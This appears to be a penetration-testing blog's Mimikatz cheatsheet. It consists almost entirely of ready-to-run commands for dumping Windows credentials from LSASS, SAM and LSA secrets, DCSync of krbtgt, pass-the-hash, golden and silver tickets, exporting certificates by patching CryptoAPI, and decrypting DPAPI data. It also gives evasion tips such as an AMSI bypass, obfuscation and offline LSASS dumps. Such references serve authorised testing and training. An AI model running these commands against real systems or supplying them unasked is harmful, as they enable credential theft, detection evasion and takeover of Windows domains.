Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

Mimikatz Cheatsheet

Basic Syntax

mimikatz.exe "command1" "command2" "exit"

Always start with:

privilege::debug

Quick Reference Commands

CommandPurpose
privilege::debugEnable debug privileges (required)
sekurlsa::logonpasswordsDump all credentials from LSASS
sekurlsa::credmanDump Credential Manager secrets
sekurlsa::tickets /exportExport Kerberos tickets
lsadump::samDump local SAM database
lsadump::secretsDump LSA secrets
lsadump::cacheDump cached domain credentials
lsadump::dcsync /user:AdministratorDCSync attack

Modules Overview

ModulePurpose
sekurlsaExtract credentials from LSASS memory
lsadumpDump LSA secrets, SAM, DCSync
kerberosKerberos ticket operations
vaultWindows Vault/Credential Manager
dpapiDPAPI decryption
cryptoCertificate and key operations
tokenToken manipulation

sekurlsa Module

CommandDescription
sekurlsa::logonpasswordsDump all logon passwords
sekurlsa::credmanDump Credential Manager
sekurlsa::dpapiDump DPAPI masterkeys
sekurlsa::ticketsList Kerberos tickets
sekurlsa::tickets /exportExport tickets to .kirbi files
sekurlsa::wdigestDump WDigest credentials
sekurlsa::ekeysDump Kerberos encryption keys

Pass-the-Hash

sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash> /run:cmd.exe

Pass-the-Hash (with RC4)

sekurlsa::pth /user:<user> /rc4:<hash> /domain:<domain> /run:cmd.exe

Pass the Key / OverPass the Hash (with AES256)

sekurlsa::pth /user:<user> /domain:<domain> /aes256:<aes256_hash> /run:cmd.exe

Extract Kerberos Keys (for Pass the Key)

sekurlsa::ekeys

crypto Module (Certificates)

CommandDescription
crypto::capiPatch CryptoAPI to make non-exportable keys exportable
crypto::cngPatch CNG to make non-exportable keys exportable
crypto::certificates /exportExport all user certificates
crypto::certificates /systemstore:local_machine /exportExport machine certificates

Export User Certificates

crypto::certificates /export

Export Machine Certificates

crypto::certificates /systemstore:local_machine /export

Make Keys Exportable (Patch CryptoAPI)

crypto::capi
crypto::cng

lsadump Module

CommandDescription
lsadump::samDump SAM database (local accounts)
lsadump::secretsDump LSA secrets
lsadump::cacheDump cached domain creds (DCC2)
lsadump::trustDump trust relationships

DCSync Attack

lsadump::dcsync /domain:domain.local /user:Administrator
lsadump::dcsync /domain:domain.local /user:krbtgt
lsadump::dcsync /domain:domain.local /all /csv

Offline SAM Dump

lsadump::sam /sam:sam.hive /system:system.hive

Offline LSA Secrets

lsadump::secrets /system:system.hive /security:security.hive

Kerberos Attacks

Golden Ticket

kerberos::golden /user:Administrator /domain:domain.local /sid:<domain_sid> /krbtgt:<krbtgt_hash> /ptt

Silver Ticket

kerberos::golden /user:Administrator /domain:domain.local /sid:<domain_sid> /target:<server> /service:<svc> /rc4:<svc_hash> /ptt

Ticket Operations

CommandDescription
kerberos::listList current tickets
kerberos::ptt <file.kirbi>Pass-the-Ticket
kerberos::purgePurge all tickets
kerberos::tgtGet current TGT

DPAPI & Vault

CommandDescription
vault::listList vault credentials
vault::credDump vault credentials
dpapi::cred /in:<file>Decrypt credential file
dpapi::blob /in:<file> /masterkey:<key>Decrypt DPAPI blob
dpapi::masterkey /in:<file> /rpcGet masterkey via RPC

One-Liners

Full Credential Dump

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

Dump SAM

mimikatz.exe "privilege::debug" "lsadump::sam" "exit"

DCSync krbtgt

mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:domain.local /user:krbtgt" "exit"

Pass-the-Hash

mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit

Export All Kerberos Tickets

mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"

Golden Ticket Attack

mimikatz.exe "privilege::debug" "kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:<hash> /ptt" "exit"

Export All Certificates

mimikatz.exe "privilege::debug" "crypto::capi" "crypto::certificates /export" "exit"

Export Machine Certificates

mimikatz.exe "privilege::debug" "crypto::capi" "crypto::certificates /systemstore:local_machine /export" "exit"

Common Errors

ErrorSolution
ERROR kuhl_m_sekurlsa_acquireLSARun as Administrator
Privilege '20' KONeed local admin rights
Handle on memoryLSASS protected, try offline dump

Evasion Tips

  • Dump LSASS with procdump -ma lsass.exe lsass.dmp and analyze offline
  • Use pypykatz for cross-platform offline analysis
  • Use PowerShell Invoke-Mimikatz with AMSI bypass
  • Obfuscate or recompile from source

Create LSASS Dump (for offline analysis)

procdump.exe -ma lsass.exe lsass.dmp

Analyze with pypykatz (Linux)

pypykatz lsa minidump lsass.dmp